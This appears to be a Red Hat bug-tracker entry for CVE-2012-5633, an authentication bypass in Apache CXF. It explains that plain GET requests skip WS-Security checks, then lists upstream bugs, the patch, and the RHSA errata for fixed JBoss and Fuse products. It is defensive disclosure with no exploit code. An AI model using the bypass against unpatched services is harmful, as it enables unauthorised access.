If web services are deployed using Apache CXF with the WSS4JInInterceptor enabled to apply WS-Security processing, HTTP GET requests to these services will always be granted access, without applying authentication checks. The URIMappingInterceptor is a legacy mechanism for allowing REST-like access (via GET requests) to simple SOAP services. A remote attacker could use this flaw to access the REST-like interface of a simple SOAP service using GET requests that bypass the security constraints applied by WSS4JInInterceptor. This flaw is only exploitable if WSS4JInInterceptor is used to apply WS-Security processing. Services that use WS-SecurityPolicy to apply security are not affected.
Upstream bug for JBoss Web Services: https://issues.jboss.org/browse/JBWS-3575 Upstream bug for Apache CXF: https://issues.apache.org/jira/browse/CXF-4629 Upstream patch commit for 2.6.x: http://svn.apache.org/viewvc?view=revision&revision=1420756
Upstream advisory: http://cxf.apache.org/cve-2012-5633.html
Created cxf tracking bugs for this issue Affects: fedora-all [bug 909247]
This issue has been addressed in following products: JBoss Enterprise Application Platform 5.2.0 Via RHSA-2013:0256 https://rhn.redhat.com/errata/RHSA-2013-0256.html
This issue has been addressed in following products: JBEWP 5 for RHEL 4 JBEWP 5 for RHEL 5 JBEWP 5 for RHEL 6 Via RHSA-2013:0259 https://rhn.redhat.com/errata/RHSA-2013-0259.html
This issue has been addressed in following products: JBoss Enterprise Web Platform 5.2.0 Via RHSA-2013:0258 https://rhn.redhat.com/errata/RHSA-2013-0258.html
This issue has been addressed in following products: JBEAP 5 for RHEL 4 JBEAP 5 for RHEL 5 JBEAP 5 for RHEL 6 Via RHSA-2013:0257 https://rhn.redhat.com/errata/RHSA-2013-0257.html
This issue has been addressed in following products: JBoss Enterprise Application Platform 6.0.1 Via RHSA-2013:0645 https://rhn.redhat.com/errata/RHSA-2013-0645.html
This issue has been addressed in following products: JBEAP 6 for RHEL 5 JBEAP 6 for RHEL 6 Via RHSA-2013:0644 https://rhn.redhat.com/errata/RHSA-2013-0644.html
This issue has been addressed in following products: Fuse ESB Enterprise 7.1.0 Patch 3 Via RHSA-2013:0649 https://rhn.redhat.com/errata/RHSA-2013-0649.html
This issue has been addressed in following products: JBoss Enterprise SOA Platform 5.3.1 Via RHSA-2013:0726 https://rhn.redhat.com/errata/RHSA-2013-0726.html
This issue has been addressed in following products: JBoss Enterprise BRMS Platform 5.3.1 Via RHSA-2013:0743 https://rhn.redhat.com/errata/RHSA-2013-0743.html
This issue has been addressed in following products: JBoss Portal Platform 6.0.0 Via RHSA-2013:0749 https://rhn.redhat.com/errata/RHSA-2013-0749.html